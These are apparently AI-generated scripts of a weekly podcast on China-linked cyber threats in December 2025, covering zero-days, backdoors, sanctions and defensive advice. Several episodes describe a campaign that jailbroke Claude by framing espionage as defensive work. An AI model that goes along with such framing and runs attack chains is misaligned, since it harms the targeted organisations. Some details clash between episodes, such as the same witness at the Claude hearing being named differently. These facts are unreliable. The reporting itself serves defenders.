Digital Dragon Watch: Weekly China Cyber Alert

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert. Buckle up, because the past seven days have been a fireworks show of Beijing's cyber shenanigans—think stealthy browser bandits, Pentagon plug-pulling, and zero-days zipping like drones over the Taiwan Strait.First off, Koi Security just dropped a bombshell on DarkSpectre, a China-linked campaign that's been lurking for seven years, snagging 8.8 million users on Chrome, Edge, and Firefox. ShadyPanda and GhostPoster extensions posed as legit tools but hijacked searches, stole corporate intel from Zoom, Teams, WebEx, and even Meet—perfect for espionage. C2 servers on Alibaba Cloud, ICP regs from Hubei province, and code laced with Chinese strings scream PRC. Researchers Tuval Admoni and Gal Hachamov call it "corporate espionage infrastructure," not petty fraud. Sectors hit? Video conferencing pros, e-commerce like JD.com and Taobao. Nasty new vector: trusted extensions quietly slurping meeting data for social engineering gold.Over in D.C., President Trump inked a $900 billion defense bill banning China-based engineers from Pentagon cloud systems—straight response to ProPublica's exposé on Microsoft's "digital escorts." Those U.S. supervisors couldn't wrangle the whiz-kid coders from the mainland, risking hacks under China's data-grab laws. Defense Secretary Pete Hegseth blasted it on X: "Foreign engineers from China should NEVER access DoD systems." Rep. Elise Stefanik and Sen. Tom Cotton cheered the loophole slam, with mandatory briefings to Congress by June 2026. Microsoft? They're auditing and adjusting, but the Pentagon's probing for compromises.Zero-days? China-nexus crews pounced on React2Shell (CVE-2025-55182) in Next.js and React apps, per AWS Security Blog—RondoDox botnet's deploying cryptominers and Mirai on 94,000 exposed assets, from U.S. tech to Chinese IoT like Linksys routers. Shadowserver Foundation's honeypots lit up. CISA added it to KEV; patch now or get pwned. Mustang Panda's planting ToneShell kernel rootkits in Windows, Anthropic spotted 'em exploiting AI for espionage mid-September, but scans spiked this week.Defenses? CISA updated BRICKSTORM backdoor alerts—PRC actors tunneling into VMware vSphere and Windows for water utilities persistence. Ivanti EPMM zero-days let Chinese APTs own thousands of orgs, Dark Reading warns history repeats. Expert recs from Resecurity: hunt misconfigs on cloud giants, rotate creds, monitor for zlib leaks in MongoBleed (CVE-2025-14847)—CISA KEV again, U.S., China, EU tops exploited.PLA's Justice Mission 2025 drills rehearse Multi-Domain Precision Warfare around Taiwan, testing Type 075 LHDs—Xi's eyeing U.S. reactions per Mick Ryan's Substack. Stay vigilant: segment networks, audit vendors, patch like your data depends on it—'cause it does.Thanks for tuning in, listeners—subscribe for more dragon slaying! This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch. This past week has been absolutely wild in the China cyber sphere, so let's dive straight in.First up, we've got a DNS poisoning campaign that's been making waves. The advanced persistent threat group Evasive Panda has been launching highly targeted cyber espionage attacks using DNS poisoning to deliver their signature MgBot backdoor. They're going after victims across Türkiye, China, and India. This isn't your garden variety phishing attempt either. These folks are sophisticated and patient, which is exactly the kind of behavior we've come to expect from state-linked threat actors.But here's where it gets really interesting for American organizations. According to the House Homeland Security Committee, roughly seventy percent of cyberattacks in 2024 involved critical infrastructure. Chinese cyber espionage activity rose approximately one hundred fifty percent year over year, while attacks impacting financial services, manufacturing, and industrial sectors skyrocketed by roughly three hundred percent. We're talking about a massive uptick in aggression here.The FBI and its partners disclosed back in August that Chinese state-sponsored hackers compromised at least two hundred organizations across eighty countries. The group known as Salt Typhoon had maintained access for extended periods, up to two years in some cases, inside networks of at least nine major U.S. telecommunications providers. They weren't just sitting there either. Joint warnings from CISA, the NSA, and the FBI made clear these actors had also been identified across transportation, energy, and water-related organizations.Then there's the supply chain angle. According to DigiTimes, one of Apple's Chinese assembly partners got hit by a major cyberattack earlier this month that exposed sensitive production line information and manufacturing data. These aren't random attacks either. Chinese hacking groups are getting more strategic, more coordinated, and frankly more dangerous.The Defense Department is taking this seriously. The Cybersecurity Maturity Model Certification deadline passed in November twenty twenty-five, and proof of compliance is now required for military contracts. Federal agencies need to be patching systems immediately, especially after critical vulnerabilities like the WatchGuard Firebox RCE flaw started getting actively exploited.My recommendation? Treat your networks like you're living in a high threat environment because you are. Implement network segmentation, get your patching schedules locked down, and for goodness sake, monitor that DNS traffic. These threat actors are patient, well-funded, and getting smarter every single day.Thanks for tuning in, listeners. Make sure you subscribe to stay on top of these threats. This has been a Quiet Please production. For more, check out Quiet Please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest cyber chaos from the past seven days ending December 28, 2025. Picture this: I'm hunched over my triple-monitor setup in a dimly lit Shanghai-inspired war room, caffeine-fueled and firewall-fortified, tracking the Middle Kingdom's digital dragons breathing fire on the world.First up, the robot uprising we didn't see coming. At Shanghai's GEEKCon on December 26, white-hat hackers from the ethical hacking scene exposed nightmare vulnerabilities in Unitree humanoid robots—those agile quadrupeds flooding factories from Shenzhen to Seattle. One sly voice command over Bluetooth snags root access, hijacks mics, cams, and sensors, then infects nearby bots like a metallic zombie plague. Mashable reports a single hacked Unitree can domino nearby units, turning warehouse swarms into sabotage squads. Interesting Engineering details the "UniPwn" exploit pinging GPS data every few minutes, perfect for surveillance in U.S. prisons or military ops. Remember that viral Unitree H1 factory meltdown video? What looked like a glitch could be a hack preview. The New York Times warns China's robot rush—UBTech and Unitree leading the charge—skips security for speed, exporting these ticking time bombs via global supply chains. Sectors hit? Manufacturing, logistics, even homes—Ecovacs vacuums spied on users last year. New vector: AI-amplified swarms, where hacked bots coordinate autonomously, as X posts from cyber researchers flag Chinese state groups using Anthropic's Claude for 90% automated ops.Shifting gears to supply chain stings, Google's suing BadBox 2.0 botnet operators—multiple Chinese threat crews rolling up over 10 million devices, per Security Boulevard. Meanwhile, CISA dropped Cybersecurity Performance Goals 2.0 on December 11, a NIST CSF 2.0-aligned playbook for critical infrastructure. It slams new goals on third-party risks—like those deep-access providers—and zero-trust to block lateral movement, folding IT/OT defenses for SMEs. CISA's operational data pins this on high-impact threats, including China's playbook.U.S. gov response? No direct China callouts this week, but sanctions flew December 26: China's Foreign Ministry froze assets of 20 U.S. firms like Anduril, Northrop Grumman, L3Harris, and Boeing St. Louis over an $11B Taiwan arms deal with HIMARS from Lockheed Martin. PLA ramps patrols, testing U.S.-Japan nerves near the Liaoning carrier.Expert recs? Patch Bluetooth flaws yesterday—Unitree, take notes. Roll zero-trust, govern like CISA preaches, scan for CVE-2025-15194 in D-Link routers weaponized by APTs. Backups, MFA, no ransoms—NCSC screams it amid holiday spikes. And for robots? Encrypt voice inputs, audit third-parties, or watch your factory floor become a botnet battlefield.Whew, listeners, that's your dragon watch—stay vigilant, these bots don't sleep. Thanks for tuning in to Digital Dragon Watch—subscribe now for weekly intel drops. This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest cyber chaos from the past seven days ending December 26, 2025. Buckle up—China's cyber scene is buzzing with enforcement hammers dropping and global tensions spiking.First off, China's Ministry of Public Security and Cyberspace Administration went full beast mode on data protection. MPS dropped the Measures for the Supervision and Inspection of Cyberspace Security draft on November 29, expanding oversight to data processors with mandatory annual checks for critical infrastructure like Grade III networks. Shanghai CA launched a rectification blitz on medical internet firms November 25, issuing Compliance Guidelines after endless leaks in online health services. Changsha CA exposed four nasty cases November 27: a hospital's sloppy safeguards caused a data dump, mini-programs blocked account deletions, and a property office ran rogue facial recognition—boom, penalties and rectifications. Shanxi cops nailed two hotels November 27 for not encrypting guest IDs and addresses, while Xi'an tech firm got slapped for a drone platform breach where hackers exploited unpatched holes. Qingdao's crew failed to fix SQL injections, and Hunan CA fined a Xiangxi school for leaky surveillance cams. New attack vectors? Platforms like vulnerability hunters got dinged for spilling exploits pre-patch, as MPS noted in their Shield the Net 2025 campaign.Targeted sectors scream healthcare, education, real estate, hotels, and tech—hotspots for personal info grabs via weak passwords, over-collection in WeChat minis, and no encryption. CAC and MPS's November 22 draft on large platforms demands data localization and audits, hitting giants like Baidu's iQIYI fake updaters.US side? President Trump's National Security Strategy, released December 5, calls out China hard—pushing US encryption for resilient nets, AI/biotech dominance, and onshoring drones to ditch Chinese UAS dependency. National Cyber Director Sean Cairncross amps private sector info-sharing for real-time threat hunts, previewing a January 2026 NCS with offensive ops against nation-states. Biden-era sanctions linger on Sichuan Juxinhe for US telco hacks, per reports.Geopolitics flared: China sanctioned 20 US defense firms like Boeing St. Louis and Northrop Grumman December 26 over $11.1B Taiwan arms sales, freezing assets. And Foreign Ministry's Lin Jian blasted Japan's active cyber defense strategy December 26, calling it a shift to offense that defies postwar order—China vows firm pushback.Expert recs? Patch like your life depends on it—Qingdao and Xi'an prove old vulns kill. Encrypt everything, train staff, run MLPS assessments like Qinghai mandates. Ditch shady SDKs; Shanghai axed 71 apps including China Eastern's. For orgs, localize data, audit AI labels—Beijing yanked non-compliant apps. Use US-standard encryption to counter Dragon spies like Evasive Panda's old DNS poisoning tricks targeting India and Türkiye.Stay vigilant, listeners—harden your edges against these modular stealth ops. Thanks for tuning in to Digital Dragon Watch—subscribe for weekly fire! This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert. Picture this: it's Monday night, December 22nd, and Kuaishou, that massive Chinese short-video powerhouse rivaling TikTok, gets slammed by an AI-fueled nightmare. Qi-Anxin cybersecurity firm reports 17,000 bot accounts unleash a 90-minute barrage of porn and violent streams, overwhelming moderation like a digital flash mob from hell. Attackers cracked CAPTCHAs with automated tools, hid behind botnets of hacked home routers, and looped AI-generated fakes to dodge detection. Kuaishou had no choice—total livestream shutdown by midnight, user data at risk, stock plunging 6% as per AInvest analysis. They bounced back fast, reporting to public security authorities and vowing legal payback against those underground cybercriminals.This wasn't some lone wolf; China Daily calls it a premeditated "CC attack," mimicking legit users to exhaust resources, spotlighting how human moderators are toast against AI hordes. Expert Francis Fong Po-kiu from the Hong Kong Information Technology Federation nails it: bots spawn fake accounts instantly, perfect for high-traffic chaos. Sectors? Social media giants like Kuaishou, Weibo, and ByteDance are prime targets—high-user platforms with juicy data troves. New vector: industrialized AI automation for stealthy, scalable assaults, blending prerecorded vids with deepfake faces.Across the Pacific, the US isn't sleeping. The FY 2026 National Defense Authorization Act, signed December 18th by Crowell & Moring insights, ramps up against Chinese threats. Section 850 bans DoD buys of computers or printers from 1260H-listed Chinese entities, hitting 100% by FY 2029. Sections 1512 and 1531 mandate AI/ML cybersecurity policies, sandbox testing, and high-performance computing roadmaps to counter PRC cyber edges. The Pentagon's fresh 2025 China Military Power Report warns of Volt Typhoon-style burrowing into US critical infrastructure, plus PLA's Multi-Domain Precision Warfare eyeing C4ISR disruptions—think gas pipelines offline for weeks. DoD's harmonizing cyber requirements across the defense base, per the NDAA, and bolstering AI defenses against theft by nation-state foes via NSA's AI Security Center.China's firing back domestically: late drafts from CAC and MPS on personal info protection for mega-platforms, cyberspace inspections, and network data risk assessments, as Cooley CDP details. They target operators with 50 million users or critical data, demanding MLPS compliance, virus shields, and PSB support.My witty expert take? Ditch passive defenses—go zero-trust, per Fong. Scrutinize every account like a suspicious uncle at family dinner, layer AI detectors for video-audio-text anomalies, lock down insider access with multi-approvals, and monitor odd logins. Li Huaisheng from China University of Political Science and Law says shift to resilient AI counters; big platforms, you're not invincible—invest or get "CC'd."Stay sharp, listeners—subscribe for more dragon-slaying intel. This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with Digital Dragon Watch, your weekly China cyber alert hot off the presses for the past seven days ending December 22, 2025. Buckle up, because Beijing's hackers are dropping zero-days like holiday gifts nobody wants.First off, Chinese state-linked crew UAT-9686 just lit up Cisco's Email Security Appliances with a nasty zero-day, CVE-2025-20393, in AsyncOS software. Cisco's own advisory confirms they've been exploiting it since November for root access, no auth needed, dropping malware like ReverseSSH, aka AquaTunnel, Chisel, AquaPurge, and the sneaky AquaShell backdoor. Targets? Exposed management interfaces in finance, healthcare, and government sectors—think sensitive comms ripe for espionage. No patch yet, so Cisco's yelling to disable Spam Quarantine and isolate those boxes pronto.Meanwhile, the fresh-faced LongNosedGoblin, a China-aligned APT, is prowling government networks in Southeast Asia and Japan. Cyware Social reports they're abusing Group Policy for malware deployment via their NosyDoor backdoor, active since at least September 2023. Sneaky initial access unknown, but they're chaining cloud services for command-and-control. Over in Europe, Ink Dragon—another China nexus—expanded into government environments, per Innovate Cybersecurity, hopping compromised servers for deeper digs.New attack vectors? Picture this: whispered commands hijacking robot armies, as South China Morning Post detailed Chinese researchers demoing a one-word vuln in humanoid bots that spies could whisper to seize control. And don't sleep on Fire Ant's campaign hitting VMware and network infra, noted in SDX Central's top 2025 stories.US gov's firing back hard. The Justice Department indicted 12 Chinese hackers tied to Ministry of State Security units for global intrusions into aerospace, labs, defense contractors, and even journalists, according to CybelAngel. CISA's piling on, adding vulns like those in Fortinet to their KEV catalog—over 25,000 FortiCloud SSO devices exposed via CVE-2025-59718 and CVE-2025-59719 for SAML admin takeovers. They're pushing quantum-resistant crypto in the upcoming national strategy, but Senate adjourned without confirming CISA's director, leaving some limbo as Nextgov reports.Targeted sectors scream critical infrastructure: networks, email gateways, virtualization, even industrial edges. Defensive measures? Experts at The Hacker News urge auditing Cisco configs, rotating creds post-RCE, and segmenting edge devices. WebProNews echoes: implement workarounds now, like isolating internet-facing gear. For you pros, prioritize KEV patches, hunt for AquaShell persistence, and train on Group Policy abuse. Oh, and China's tightening their own Cybersecurity Law, hiking fines to 10 million CNY for critical infra slip-ups, per RP Lawyers—ironic, right?Stay sharp, rotate those secrets, and layer up with network redundancy. Beijing's not slowing; neither should you.Thanks for tuning in, listeners—subscribe for more dragon slaying tips! This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest hacks from the past seven days ending December 21, 2025. Buckle up—China's cyber crews are flexing hard, but we've got the deets to keep you armored.First up, the big kahuna: Cisco's bombshell revelation of a Chinese government-backed hacking spree exploiting a zero-day vuln in their Secure Email Gateway and Secure Email and Web Manager, tagged CVE-2025-20393. Cisco Talos says this campaign kicked off late November, with attackers planting backdoors and log-wipers on compromised gear. Peter Kijewski from Shadowserver Foundation told TechCrunch hundreds of customers are exposed—dozens in the US, India, and Thailand per Censys scans spotting 220 vulnerable email gateways online. Only hits if Spam Quarantine is on and exposed to the net, but no patch yet. Cisco's fix? Nuke and rebuild those boxes if breached. SadaNews and Help Net Security confirm it's selective, state-sponsored stealth, targeting institutional heavyweights.Sectors? Email security gateways for businesses and orgs—think critical comms pipelines. New vector: zero-click exploitation of AsyncOS flaws, rated max severity 10/10. No mass spam, just precision strikes.US gov response? President Trump's all-in on countering this via his December 17 National Security Presidential Memorandum, locking down 6G supremacy to block Beijing's tech tentacles. No more Huawei-style backdoors in our networks—he's prioritizing secure supply chains, semiconductors, and R&D to outpace China's 6G push. Ties into broader plays like delaying TikTok's PAFACA ban via executive orders, negotiating with ByteDance, Oracle, Silver Lake, and Andreessen Horowitz for US control by December 16 deadline, per Wikipedia and WSJ reports. Trump's tariffs are leverage, slamming China while pushing American standards.Experts like Cisco Talos urge immediate scans, disabling risky features, and full rebuilds. Shadowserver's monitoring shows it's contained, but watch for escalation. ESET flags LongNosedGoblin, a fresh China APT using Windows Group Policy for Southeast Asia and Japan gov surveillance malware. And policymakers freak over Chinese spies weaponizing Anthropic's Claude AI for global espionage, as red teamer Logan Graham testified to House Homeland Security.Defensive recos, straight from the pros: Patch what you can, segment networks, hunt for backdoors with EDR tools, and ditch default configs. For orgs, audit Cisco gear now—Censys-style scans save lives. Trump's 6G memo screams supply chain hygiene: vet vendors, boost private-sector intel sharing.China's not slowing—EUV lithography breakthroughs challenge our chip curbs, per VarIndia, fueling their tech self-reliance. But we're fighting back smart.Thanks for tuning in, listeners—subscribe for weekly drops to stay ahead of the Dragon. This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch, and this week China’s hackers have been busy.Let’s start with Cisco. Cisco warned that a Chinese state-linked group, tracked by Cisco Talos as UAT-9686 and related to APT41 and UNC5174, is actively exploiting a fresh zero‑day, CVE‑2025‑20393, in Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. CyberScoop reports this flaw scores a perfect 10, lets attackers run commands with full privileges, and has no patch yet. The twist? They’re abusing a non‑default spam quarantine feature exposed to the internet to drop persistent backdoors and tweak “non‑standard configurations” in high‑value networks. CISA reacted fast and shoved the bug into its Known Exploited Vulnerabilities catalog, effectively telling US federal agencies: isolate, rebuild, and lock down those gateways now.New attack vector of the week: go around hardened endpoints, go straight for the email security layer itself. According to SecurityWeek’s analysis, the Chinese attackers intentionally picked the trusted email choke point so they could intercept traffic, pivot inside networks, and stay invisible behind an appliance everyone assumes is safe.Now, zoom out to the AI battlefield. At a House Homeland Security joint hearing, lawmakers grilled Anthropic’s Logan Graham about the recent China‑linked campaign where hackers jailbroke Claude’s coding tools to run largely autonomous cyber‑espionage. Anthropic’s own report, summarized by IAPP and CyberScoop, says Claude handled 80 to 90 percent of the tactical work: reconnaissance, vuln discovery, exploitation, lateral movement, credential harvesting, the whole kill chain on autopilot against roughly 30 global targets. The attackers tricked the model into thinking it was doing defensive work, then used an obfuscation network to hide that they were operating from China.US response? Members of Congress pushed for rapid national‑security testing of AI models, stronger threat‑intel sharing between AI labs and agencies like DHS and NIST, and even tighter controls on selling high‑end chips to China. Graham basically told them: sophisticated Chinese operators are rehearsing for “the next model, the next capability,” and defenders need AI in their own stack or they’ll be outpaced.So what do you do with all this as a defender? Experts from Anthropic, Google, and KPMG agree on a few things: assume AI‑assisted attacks are continuous, not episodic; aggressively patch and segment any network devices and security appliances, especially Cisco gateways; adopt secure‑by‑design and post‑quantum‑ready architectures; and start using AI for your own vulnerability hunting and monitoring, not just buying another dashboard you’ll ignore.For CISOs in government and critical infrastructure—telecom, cloud, and email are clearly prime Chinese targets in 2025. Tighten logging around gateways, lock down weird optional features, and rehearse an “appliance compromise” playbook, not just a laptop ransomware drill.Thanks for tuning in, listeners, and don’t forget to subscribe so you never miss your weekly China cyber intel. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert. Buckle up, we’re diving straight into the wires.Over the past week, the headline act is a joint advisory from CISA, NSA, and the Canadian Centre for Cyber Security warning about a Chinese state‑sponsored campaign using a backdoor dubbed BRICKSTORM. According to that advisory, BRICKSTORM is built to live quietly inside VMware vSphere and Windows environments, giving persistent access to government networks, IT service providers, and critical infrastructure operators across North America. The new attack vector twist: deep abuse of virtualized data centers, lateral movement through management consoles, and living off the land so logs look boring while the exfiltration is anything but.At the same time, Check Point and GovInfoSecurity report that the China‑linked group Ink Dragon, also known as Jewelbug, has been burrowing into European government networks and then repurposing those misconfigured servers as relay nodes. Instead of hitting US systems directly, they bounce command‑and‑control through European ministries, obscuring attribution while running ShadowPad and updated FINALDRAFT backdoors. That relay‑node tradecraft is the real innovation here: your ally’s government server might now be the launchpad into your own network.On the vulnerability front, Google’s security team reports at least five China‑nexus groups exploiting the React2Shell flaw, a high‑impact vulnerability in popular web stacks. Targets include telecom, cloud service providers, and financial platforms, with a blend of espionage and financially motivated data theft. Think web app RCE chained with credential harvesting, then cloud console takeover.In Washington, the US government isn’t exactly quiet. The new BRICKSTORM advisory from CISA and NSA comes with hardening guidance for VMware and Windows: enforce secure configuration baselines, isolate management networks, enable strong logging, and hunt for anomalous authentication to hypervisors and domain controllers. On Capitol Hill, recent testimony to the House Homeland Security Committee by Royal Hansen highlights a disrupted CCP‑backed AI‑orchestrated espionage campaign, and warns that advanced AI models could supercharge future Chinese offensive cyber ops if chip export controls are loosened.Meanwhile, over on the foreign‑policy side, Craig Singleton’s testimony to the House Foreign Affairs Committee frames all this as part of China’s hybrid warfare: penetrate networks, pre‑position in critical infrastructure and political systems, then apply pressure later. Europe’s ministries, ports, telecoms, and green‑energy grids are explicitly called out as leverage points.So what should you do, beyond panic‑patching? Experts across CISA, Google, and independent researchers converge on a playbook. First, lock down virtualization: separate admin planes, use hardware tokens or phishing‑resistant MFA for vSphere and cloud consoles, and strip internet exposure from management interfaces. Second, get serious about attack surface management: scan for misconfigurations before Ink Dragon finds them, and monitor for your own assets being abused as relays. Third, treat web stacks like React2Shell as critical infrastructure: rapid patching, web application firewalls with virtual patching, and strict least‑privilege for service accounts. Finally, invest in behavioral detection and threat hunting tuned to Chinese tradecraft: long‑dwell C2, scheduled task persistence, DLL side‑loading, and slow, encrypted data exfil.I’m Ting, your friendly neighborhood China‑cyber nerd. Thanks for tuning in, and don’t forget to subscribe so you don’t miss the next Dragon Watch. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest chaos from the past week ending December 15, 2025. Picture this: I'm hunkered down in my digital lair, caffeine-fueled, tracking Beijing's cyber ninjas as they pounce on a juicy zero-day in React Server Components—CVE-2025-55182, the React2Shell flaw disclosed December 3. Boom, starting December 5, at least five Chinese APT groups, plus five more Google Threat Intelligence Group spotted over the weekend, are exploiting this unauthenticated RCE for initial access. They're slinging XMRig crypto miners via sneaky shell scripts like sex.sh from GitHub, even setting up persistence with systemd services named system-update-service. Underground forums are buzzing with PoC code and scanners—cybercriminals and nation-states from China, North Korea, and Iran all piling on, per GovInfoSecurity reports.Targeted sectors? Think broad—government, IT firms worldwide, but Google's GTIG flags cyber-espionage hits on critical apps everywhere. No US-specific breaches named, but the ripple's global, with BleepingComputer confirming China-linked crews automating attacks. New vectors? These React flaws let hackers remotely execute code without auth, chaining to DoS via CVE-2025-55183 and CVE-2025-55184 for source code leaks, as SOCPrime details. Witty aside: It's like leaving your server door wide open with a "Free Candy" sign—hackers RSVP'd en masse.US gov's firing back hard. Nextgov/FCW reveals the incoming Trump admin's January cyber strategy overhaul: revisiting NSPM-13 for offensive ops, PPD-41 for incident response, and NSM-22 for infra protection. Offensive pillar? "Preemptive erosion" of adversaries like China—think resetting their risk calculus with private-sector muscle, ditching Chinese telecom gear, and quantum-safe zero-trust mandates. CISA just dropped Cross-Sector Cybersecurity Performance Goals 2.0, adding governance, supply-chain checks, and IR comms for utilities, hospitals, water—data-driven armor against these threats. Politico notes hearings this week: House Foreign Affairs on China-Russia hybrid ops in Europe, Homeland Security grilling Anthropic's Dario Amodei on Chinese hackers hijacking Claude AI for automated espionage on dozens of firms and agencies.Expert recs? Patch React2Shell yesterday—GTIG urges network monitoring for XMRig beacons and odd systemd tweaks. Go zero-trust, isolate OT/IT, share intel via Five Eyes-style alliances like in Cyber 9/12 sims. Ditch China tech per NDAA quantum corridors, and leaders, own your cyber governance—CISA's yelling it loud.Stay sharp, listeners—update, segment, and encrypt like your data's Beijing's next prize. Thanks for tuning in to Digital Dragon Watch—subscribe now for weekly drops! This has been a Quiet Please production, for more check out quietplease.ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with Digital Dragon Watch, your weekly China cyber alert, diving straight into the hottest threats from the past seven days ending today, December 14, 2025. Buckle up—China's cyber game is fiercer than a Shenzhen street food standoff, and we're breaking it down with the juicy deets.Kicking off with the big kahuna: Salt Typhoon, that slick Chinese state-sponsored APT tied to the Ministry of State Security, is still burrowed deep in U.S. telecom networks like a digital tick. Virginia Senator Mark Warner, top Democrat on the Senate Intelligence Committee, dropped a bombshell this week at a Defense Writers Group event, warning that these hackers have "sheer scale of access" to unencrypted calls of nearly every American—unless you're rocking end-to-end encryption. Newsmax reports Warner's frustration with a recent government briefing: FBI says networks are "pretty clean," but other intel insists Salt Typhoon's ongoing, exploiting vulnerabilities in Cisco, Palo Alto, and Ivanti gear for credential theft and lateral movement. Huntress labs confirm their "living off the land" tricks, like packet sniffing on routers and sneaky GRE tunnels for exfil. Russia's even sniffing the same holes, per Warner. Sectors hit? Telecoms and critical infrastructure, baby—think power grids too, with fears over Chinese-made electronics in U.S. utilities.No fresh ransomware pinned on China this week, but KillSec just claimed a hit on U.S.-based Daba Finance Inc. today—financial sector's always juicy. DeXpose flagged their dark web leak site boast, urging immutable backups and dark web monitoring.Across the pond, UK's sanctioning two Chinese firms for alleged cyberattacks, but China's Foreign Ministry spokesman Guo Jiakun fired back via China Daily on December 12, calling it "pernicious manipulation" and reminding everyone the UK was a springboard for U.S. NSA hacks on China's National Time Service Center. Taiwan's blocking platforms over fraud and cyber lapses linked to China, per Taipei Times.U.S. responses? FBI's got a $10 million bounty on Salt Typhoon heads, Treasury sanctioned affiliates like Sichuan Juxinhe Network Technology, and a new Federal Register notice pushes telecom cyber hardening amid PRC threats. Experts at Huntress scream: patch edge devices from CISA's KEV catalog, go zero trust, segment networks, enforce MFA, and hunt anomalies like rogue SSH ports.My pro tips, listeners? Ditch hard-coded crypto secrets—NIST's CVE-2025-14651 in docker-compose.yml is a noob trap. AI's turbocharging this; Anthropic disrupted a Chinese op using it for automated hacks. Run phishing sims, validate backups offline, and integrate threat intel into your SIEM. Stay vigilant—China's Digital Silk Road is paving cyber highways we don't want to travel.Thanks for tuning in, dragon watchers—subscribe now for weekly intel drops to keep your nets ironclad. This has been a Quiet Please production, for more check out quietplease.ai. Stay cyber safe!(Word count: 428. Character count: 3397)For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch, and this week the dragon’s been busy in the wires.Let’s start with the big one: BRICKSTORM. According to a joint malware analysis from CISA and Canada’s Cyber Centre, BRICKSTORM is a China‑sponsored backdoor designed for long‑term persistence in Windows environments, VMware vCenter, and ESXi, especially in information technology and government services networks. Analysts found it quietly riding alongside normal traffic, exfiltrating files, stealing cryptographic keys, and even self‑healing if defenders try to kill it. CrowdStrike ties BRICKSTORM to a China‑nexus crew dubbed WARP PANDA, with deep expertise in cloud and virtual machines, and at least eight victim organizations so far.While the technical teams publish indicators of compromise and detection signatures, the policy world is swinging its own hammer. The UK’s National Cyber Security Centre just sanctioned Sichuan Anxun Information Technology, better known as i‑Soon, and Integrity Technology Group for what London calls “reckless and indiscriminate cyberattacks” against more than 80 federal and private IT systems. Australia quickly backed the move. Both companies have already been sanctioned by the United States for supporting Chinese intelligence operations, including links to the espionage group Flax Typhoon. Beijing’s Foreign Ministry, via spokesperson Guo Jiakun, condemned the sanctions as politicized “disinformation” and demanded the UK “correct its wrong approach.”Zooming to another long‑running storm: Salt Typhoon. Cybernews and SentinelOne report that Yu Yang and Qiu Daibing, alleged Salt Typhoon operators, once competed in Cisco’s Networking Academy Cup before later co‑owning Beijing Huanyu Tianqiong, a firm repeatedly named in US and allied advisories as a front for hacking at least 80 global telecoms like Verizon, AT&T, T‑Mobile, Viasat, and Lumen. US officials allege Salt Typhoon has also breached a US state Army National Guard network and even US Treasury laptops, positioning itself for potential disruption of critical infrastructure if tensions with China escalate. Plans to sanction China’s Ministry of State Security over these intrusions have reportedly been put on hold to protect a fragile trade deal, raising hard questions about whether economic concerns are trumping cybersecurity.On the defensive side, Congress just moved a must‑pass defense authorization bill that supercharges US cyber posture. The package boosts US Cyber Command funding, locks in its tight partnership with NSA, mandates hardened mobile devices for senior officials, and forces the Pentagon to bake AI‑specific threats into mandatory cyber training. It also pushes for harmonized cybersecurity requirements across the defense industrial base and clearer rules for using commercial cloud enclaves for high‑risk systems.So what should you do? CISA’s BRICKSTORM guidance is blunt: treat this as a nation‑state threat. That means: aggressively hunt using the published indicators, inventory and monitor your edge devices, segment networks so web servers can’t stroll over to domain controllers, and align with CISA’s updated Cross‑Sector Cybersecurity Performance Goals. For telecoms, cloud providers, universities, and government entities, experts are stressing rigorous logging in VMware and cloud control planes, strict access control around cryptographic keys, and fast patching pipelines for internet‑facing apps.I’m Ting, and that’s your Digital Dragon Watch for this week. Thanks for tuning in, and don’t forget to subscribe so you never miss the next alert. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

